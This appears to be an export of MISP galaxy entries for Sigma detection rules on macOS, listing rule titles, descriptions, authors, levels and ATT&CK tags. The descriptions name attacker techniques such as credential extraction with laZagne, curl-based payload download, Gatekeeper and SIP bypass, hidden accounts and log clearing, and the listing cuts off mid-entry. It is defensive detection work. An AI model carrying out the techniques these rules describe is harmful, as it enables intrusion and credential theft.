tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.014']
Related clusters

To see the related clusters, click here.

JXA In-memory Execution Via OSAScript

Detects possible malicious execution of JXA in-memory via OSAScript

Internal MISP references

UUID f1408a58-0e94-4165-b80a-da9f96cf6fc3 which can be used as unique global reference for JXA In-memory Execution Via OSAScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/01/31
falsepositive ['Unknown']
filename proc_creation_macos_jxa_in_memory_execution.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.t1059.002', 'attack.t1059.007', 'attack.execution']
Related clusters

To see the related clusters, click here.

Suspicious Microsoft Office Child Process - MacOS

Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution

Internal MISP references

UUID 69483748-1525-4a6c-95ca-90dc8d431b68 which can be used as unique global reference for Suspicious Microsoft Office Child Process - MacOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/01/31
falsepositive ['Unknown']
filename proc_creation_macos_office_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.execution', 'attack.persistence', 'attack.t1059.002', 'attack.t1137.002', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Security Software Discovery - MacOs

Detects usage of system utilities (only grep for now) to discover security software discovery

Internal MISP references

UUID 0ed75b9c-c73b-424d-9e7d-496cd565fbe0 which can be used as unique global reference for Security Software Discovery - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_security_software_discovery.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.

OSACompile Run-Only Execution

Detects potential suspicious run-only executions compiled using OSACompile

Internal MISP references

UUID b9d9b652-d8ed-4697-89a2-a1186ee680ac which can be used as unique global reference for OSACompile Run-Only Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/01/31
falsepositive ['Unknown']
filename proc_creation_macos_osacompile_runonly_execution.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.t1059.002', 'attack.execution']
Related clusters

To see the related clusters, click here.

System Integrity Protection (SIP) Enumeration

Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.

Internal MISP references

UUID 53821412-17b0-4147-ade0-14faae67d54b which can be used as unique global reference for System Integrity Protection (SIP) Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024/01/02
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_csrutil_status.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.

System Information Discovery Using sw_vers

Detects the use of "sw_vers" for system information discovery

Internal MISP references

UUID 5de06a6f-673a-4fc0-8d48-bcfe3837b033 which can be used as unique global reference for System Information Discovery Using sw_vers in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/12/20
falsepositive ['Legitimate administrative activities']
filename proc_creation_macos_swvers_discovery.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

System Integrity Protection (SIP) Disabled

Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.

Internal MISP references

UUID 3603f18a-ec15-43a1-9af2-d196c8a7fec6 which can be used as unique global reference for System Integrity Protection (SIP) Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024/01/02
falsepositive ['Unknown']
filename proc_creation_macos_csrutil_disable.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1518.001']
Related clusters

To see the related clusters, click here.

Screen Capture - macOS

Detects attempts to use screencapture to collect macOS screenshots

Internal MISP references

UUID 0877ed01-da46-4c49-8476-d49cdd80dfa7 which can be used as unique global reference for Screen Capture - macOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author remotephone, oscd.community
creation_date 2020/10/13
falsepositive ['Legitimate user activity taking screenshots']
filename proc_creation_macos_screencapture.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

Clipboard Data Collection Via OSAScript

Detects possible collection of data from the clipboard via execution of the osascript binary

Internal MISP references

UUID 7794fa3c-edea-4cff-bec7-267dd4770fd7 which can be used as unique global reference for Clipboard Data Collection Via OSAScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/01/31
falsepositive ['Unlikely']
filename proc_creation_macos_clipboard_data_via_osascript.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.collection', 'attack.execution', 'attack.t1115', 'attack.t1059.002']
Related clusters

To see the related clusters, click here.

System Information Discovery Using Ioreg

Detects the use of "ioreg" which will show I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.

Internal MISP references

UUID 2d5e7a8b-f484-4a24-945d-7f0efd52eab0 which can be used as unique global reference for System Information Discovery Using Ioreg in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/12/20
falsepositive ['Legitimate administrative activities']
filename proc_creation_macos_ioreg_discovery.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

File and Directory Discovery - MacOS

Detects usage of system utilities to discover files and directories

Internal MISP references

UUID 089dbdf6-b960-4bcc-90e3-ffc3480c20f6 which can be used as unique global reference for File and Directory Discovery - MacOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_file_and_directory_discovery.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

MacOS Scripting Interpreter AppleScript

Detects execution of AppleScript of the macOS scripting language AppleScript.

Internal MISP references

UUID 1bc2e6c5-0885-472b-bed6-be5ea8eace55 which can be used as unique global reference for MacOS Scripting Interpreter AppleScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/21
falsepositive ['Application installers might contain scripts as part of the installation process.']
filename proc_creation_macos_applescript.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.execution', 'attack.t1059.002']
Related clusters

To see the related clusters, click here.

Osacompile Execution By Potentially Suspicious Applet/Osascript

Detects potential suspicious applet or osascript executing "osacompile".

Internal MISP references

UUID a753a6af-3126-426d-8bd0-26ebbcb92254 which can be used as unique global reference for Osacompile Execution By Potentially Suspicious Applet/Osascript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r), Red Canary (Idea)
creation_date 2023/04/03
falsepositive ['Unknown']
filename proc_creation_macos_suspicious_applet_behaviour.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.execution', 'attack.t1059.002']
Related clusters

To see the related clusters, click here.

Gatekeeper Bypass via Xattr

Detects macOS Gatekeeper bypass via xattr utility

Internal MISP references

UUID f5141b6d-9f42-41c6-a7bf-2a780678b29b which can be used as unique global reference for Gatekeeper Bypass via Xattr in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_xattr_gatekeeper_bypass.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1553.001']
Related clusters

To see the related clusters, click here.

Root Account Enable Via Dsenableroot

Detects attempts to enable the root account via "dsenableroot"

Internal MISP references

UUID 821bcf4d-46c7-4b87-bc57-9509d3ba7c11 which can be used as unique global reference for Root Account Enable Via Dsenableroot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/08/22
falsepositive ['Unknown']
filename proc_creation_macos_dsenableroot_enable_root_account.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.t1078', 'attack.t1078.001', 'attack.t1078.003', 'attack.initial_access', 'attack.persistence']
Related clusters

To see the related clusters, click here.

MacOS Network Service Scanning

Detects enumeration of local or remote network services.

Internal MISP references

UUID 84bae5d4-b518-4ae0-b331-6d4afd34d00f which can be used as unique global reference for MacOS Network Service Scanning in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/21
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_network_service_scanning.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Suspicious Browser Child Process - MacOS

Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.

Internal MISP references

UUID 0250638a-2b28-4541-86fc-ea4c558fa0c6 which can be used as unique global reference for Suspicious Browser Child Process - MacOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/04/05
falsepositive ['Legitimate browser install, update and recovery scripts']
filename proc_creation_macos_susp_browser_child_process.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.execution', 'attack.t1189', 'attack.t1203', 'attack.t1059']
Related clusters

To see the related clusters, click here.

JAMF MDM Potential Suspicious Child Process

Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.

Internal MISP references

UUID 2316929c-01aa-438c-970f-099145ab1ee6 which can be used as unique global reference for JAMF MDM Potential Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/22
falsepositive ['Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly']
filename proc_creation_macos_jamf_susp_child.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.execution']

Suspicious Execution via macOS Script Editor

Detects when the macOS Script Editor utility spawns an unusual child process.

Internal MISP references

UUID 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4 which can be used as unique global reference for Suspicious Execution via macOS Script Editor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022/10/21
falsepositive ['Unknown']
filename proc_creation_macos_susp_execution_macos_script_editor.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.t1566', 'attack.t1566.002', 'attack.initial_access', 'attack.t1059', 'attack.t1059.002', 'attack.t1204', 'attack.t1204.001', 'attack.execution', 'attack.persistence', 'attack.t1553', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Potential Persistence Via PlistBuddy

Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility

Internal MISP references

UUID 65d506d3-fcfe-4071-b4b2-bcefe721bbbb which can be used as unique global reference for Potential Persistence Via PlistBuddy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/02/18
falsepositive ['Unknown']
filename proc_creation_macos_persistence_via_plistbuddy.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.persistence', 'attack.t1543.001', 'attack.t1543.004']
Related clusters

To see the related clusters, click here.

Guest Account Enabled Via Sysadminctl

Detects attempts to enable the guest account using the sysadminctl utility

Internal MISP references

UUID d7329412-13bd-44ba-a072-3387f804a106 which can be used as unique global reference for Guest Account Enabled Via Sysadminctl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/02/18
falsepositive ['Unknown']
filename proc_creation_macos_sysadminctl_enable_guest_account.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.t1078', 'attack.t1078.001']
Related clusters

To see the related clusters, click here.

Binary Padding - MacOS

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.

Internal MISP references

UUID 95361ce5-c891-4b0a-87ca-e24607884a96 which can be used as unique global reference for Binary Padding - MacOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, Mikhail Larin, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate script work']
filename proc_creation_macos_binary_padding.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1027.001']
Related clusters

To see the related clusters, click here.

Creation Of A Local User Account

Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.

Internal MISP references

UUID 51719bf5-e4fd-4e44-8ba8-b830e7ac0731 which can be used as unique global reference for Creation Of A Local User Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_create_account.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.t1136.001', 'attack.persistence']
Related clusters

To see the related clusters, click here.

System Information Discovery Using System_Profiler

Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.

Internal MISP references

UUID 4809c683-059b-4935-879d-36835986f8cf which can be used as unique global reference for System Information Discovery Using System_Profiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stephen Lincoln @slincoln_aiq (AttackIQ)
creation_date 2024/01/02
falsepositive ['Legitimate administrative activities']
filename proc_creation_macos_system_profiler_discovery.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.defense_evasion', 'attack.t1082', 'attack.t1497.001']
Related clusters

To see the related clusters, click here.

Potential Discovery Activity Using Find - MacOS

Detects usage of "find" binary in a suspicious manner to perform discovery

Internal MISP references

UUID 85de3a19-b675-4a51-bfc6-b11a5186c971 which can be used as unique global reference for Potential Discovery Activity Using Find - MacOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/28
falsepositive ['Unknown']
filename proc_creation_macos_susp_find_execution.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Hidden User Creation

Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option

Internal MISP references

UUID b22a5b36-2431-493a-8be1-0bae56c28ef3 which can be used as unique global reference for Hidden User Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/10
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_create_hidden_account.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1564.002']
Related clusters

To see the related clusters, click here.

Suspicious History File Operations

Detects commandline operations on shell history files

Internal MISP references

UUID 508a9374-ad52-4789-b568-fc358def2c65 which can be used as unique global reference for Suspicious History File Operations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mikhail Larin, oscd.community
creation_date 2020/10/17
falsepositive ['Legitimate administrative activity', 'Legitimate software, cleaning hist file']
filename proc_creation_macos_susp_histfile_operations.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.credential_access', 'attack.t1552.003']
Related clusters

To see the related clusters, click here.

Potential Base64 Decoded From Images

Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.

Internal MISP references

UUID 09a910bf-f71f-4737-9c40-88880ba5913d which can be used as unique global reference for Potential Base64 Decoded From Images in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/12/20
falsepositive ['Unknown']
filename proc_creation_macos_tail_base64_decode_from_image.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

System Network Connections Discovery - MacOs

Detects usage of system utilities to discover system network connections

Internal MISP references

UUID 9a7a0393-2144-4626-9bf1-7c2f5a7321db which can be used as unique global reference for System Network Connections Discovery - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_system_network_connections_discovery.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1049']
Related clusters

To see the related clusters, click here.

System Network Discovery - macOS

Detects enumeration of local network configuration

Internal MISP references

UUID 58800443-f9fc-4d55-ae0c-98a3966dfb97 which can be used as unique global reference for System Network Discovery - macOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author remotephone, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_system_network_discovery.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1016']
Related clusters

To see the related clusters, click here.

Potential XCSSET Malware Infection

Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.

Internal MISP references

UUID 47d65ac0-c06f-4ba2-a2e3-d263139d0f51 which can be used as unique global reference for Potential XCSSET Malware Infection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022/10/17
falsepositive ['Unknown']
filename proc_creation_macos_xcsset_malware_infection.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.command_and_control']

Credentials In Files

Detecting attempts to extract passwords with grep and laZagne

Internal MISP references

UUID 53b1b378-9b06-4992-b972-dde6e423d2b4 which can be used as unique global reference for Credentials In Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, Mikhail Larin, oscd.community
creation_date 2020/10/19
falsepositive ['Unknown']
filename proc_creation_macos_find_cred_in_files.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Suspicious MacOS Firmware Activity

Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.

Internal MISP references

UUID 7ed2c9f7-c59d-4c82-a7e2-f859aa676099 which can be used as unique global reference for Suspicious MacOS Firmware Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/30
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_susp_macos_firmware_activity.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.impact']

User Added To Admin Group Via Dscl

Detects attempts to create and add an account to the admin group via "dscl"

Internal MISP references

UUID b743623c-2776-40e0-87b1-682b975d0ca5 which can be used as unique global reference for User Added To Admin Group Via Dscl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/03/19
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_dscl_add_user_to_admin_group.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.privilege_escalation', 'attack.t1078.003']
Related clusters

To see the related clusters, click here.

File Time Attribute Change

Detect file time attribute change to hide new or changes to existing files

Internal MISP references

UUID 88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0 which can be used as unique global reference for File Time Attribute Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, Mikhail Larin, oscd.community
creation_date 2020/10/19
falsepositive ['Unknown']
filename proc_creation_macos_change_file_time_attr.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1070.006']
Related clusters

To see the related clusters, click here.

Payload Decoded and Decrypted via Built-in Utilities

Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.

Internal MISP references

UUID 234dc5df-40b5-49d1-bf53-0d44ce778eca which can be used as unique global reference for Payload Decoded and Decrypted via Built-in Utilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022/10/17
falsepositive ['Unknown']
filename proc_creation_macos_payload_decoded_and_decrypted.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.t1059', 'attack.t1204', 'attack.execution', 'attack.t1140', 'attack.defense_evasion', 'attack.s0482', 'attack.s0402']
Related clusters

To see the related clusters, click here.

Space After Filename - macOS

Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.

Internal MISP references

UUID b6e2a2e3-2d30-43b1-a4ea-071e36595690 which can be used as unique global reference for Space After Filename - macOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author remotephone
creation_date 2021/11/20
falsepositive ['Mistyped commands or legitimate binaries named to match the pattern']
filename proc_creation_macos_space_after_filename.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1036.006']
Related clusters

To see the related clusters, click here.

Potential In-Memory Download And Compile Of Payloads

Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware

Internal MISP references

UUID 13db8d2e-7723-4c2c-93c1-a4d36994f7ef which can be used as unique global reference for Potential In-Memory Download And Compile Of Payloads in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r), Red Canary (idea)
creation_date 2023/08/22
falsepositive ['Unknown']
filename proc_creation_macos_susp_in_memory_download_and_compile.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.command_and_control', 'attack.execution', 'attack.t1059.007', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Local Groups Discovery - MacOs

Detects enumeration of local system groups

Internal MISP references

UUID 89bb1f97-c7b9-40e8-b52b-7d6afbd67276 which can be used as unique global reference for Local Groups Discovery - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, Alejandro Ortuno, oscd.community
creation_date 2020/10/11
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_local_groups.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1069.001']
Related clusters

To see the related clusters, click here.

Scheduled Cron Task/Job - MacOs

Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.

Internal MISP references

UUID 7c3b43d8-d794-47d2-800a-d277715aa460 which can be used as unique global reference for Scheduled Cron Task/Job - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_schedule_task_job_cron.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

Decode Base64 Encoded Text -MacOs

Detects usage of base64 utility to decode arbitrary base64-encoded text

Internal MISP references

UUID 719c22d7-c11a-4f2c-93a6-2cfdd5412f68 which can be used as unique global reference for Decode Base64 Encoded Text -MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_base64_decode.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Macos Remote System Discovery

Detects the enumeration of other remote systems.

Internal MISP references

UUID 10227522-8429-47e6-a301-f2b2d014e7ad which can be used as unique global reference for Macos Remote System Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/22
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_remote_system_discovery.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

User Added To Admin Group Via DseditGroup

Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.

Internal MISP references

UUID 5d0fdb62-f225-42fb-8402-3dfe64da468a which can be used as unique global reference for User Added To Admin Group Via DseditGroup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/08/22
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_dseditgroup_add_to_admin_group.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.privilege_escalation', 'attack.t1078.003']
Related clusters

To see the related clusters, click here.

Split A File Into Pieces

Detection use of the command "split" to split files into parts and possible transfer.

Internal MISP references

UUID 7f2bb9d5-6395-4de5-969c-70c11fbe6b12 which can be used as unique global reference for Split A File Into Pieces in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, Mikhail Larin, oscd.community
creation_date 2020/10/15
falsepositive ['Legitimate administrative activity']
filename proc_creation_macos_split_file_into_pieces.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.exfiltration', 'attack.t1030']
Related clusters

To see the related clusters, click here.

Suspicious Installer Package Child Process

Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters

Internal MISP references

UUID e0cfaecd-602d-41af-988d-f6ccebb2af26 which can be used as unique global reference for Suspicious Installer Package Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/02/18
falsepositive ['Legitimate software uses the scripts (preinstall, postinstall)']
filename proc_creation_macos_installer_susp_child_process.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.t1059', 'attack.t1059.007', 'attack.t1071', 'attack.t1071.001', 'attack.execution', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

GUI Input Capture - macOS

Detects attempts to use system dialog prompts to capture user credentials

Internal MISP references

UUID 60f1ce20-484e-41bd-85f4-ac4afec2c541 which can be used as unique global reference for GUI Input Capture - macOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author remotephone, oscd.community
creation_date 2020/10/13
falsepositive ['Legitimate administration tools and activities']
filename proc_creation_macos_gui_input_capture.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.credential_access', 'attack.t1056.002']
Related clusters

To see the related clusters, click here.

User Added To Admin Group Via Sysadminctl

Detects attempts to create and add an account to the admin group via "sysadminctl"

Internal MISP references

UUID 652c098d-dc11-4ba6-8566-c20e89042f2b which can be used as unique global reference for User Added To Admin Group Via Sysadminctl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/03/19
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_sysadminctl_add_user_to_admin_group.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.privilege_escalation', 'attack.t1078.003']
Related clusters

To see the related clusters, click here.

Local System Accounts Discovery - MacOs

Detects enumeration of local systeam accounts on MacOS

Internal MISP references

UUID ddf36b67-e872-4507-ab2e-46bda21b842c which can be used as unique global reference for Local System Accounts Discovery - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_local_account.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1087.001']
Related clusters

To see the related clusters, click here.

Potential WizardUpdate Malware Infection

Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.

Internal MISP references

UUID f68c4a4f-19ef-4817-952c-50dce331f4b0 which can be used as unique global reference for Potential WizardUpdate Malware Infection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022/10/17
falsepositive ['Unknown']
filename proc_creation_macos_wizardupdate_malware_infection.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.command_and_control']

Indicator Removal on Host - Clear Mac System Logs

Detects deletion of local audit logs

Internal MISP references

UUID acf61bd8-d814-4272-81f0-a7a269aa69aa which can be used as unique global reference for Indicator Removal on Host - Clear Mac System Logs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author remotephone, oscd.community
creation_date 2020/10/11
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_clear_system_logs.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1070.002']
Related clusters

To see the related clusters, click here.

Remote Access Tool - Team Viewer Session Started On MacOS Host

Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

Internal MISP references

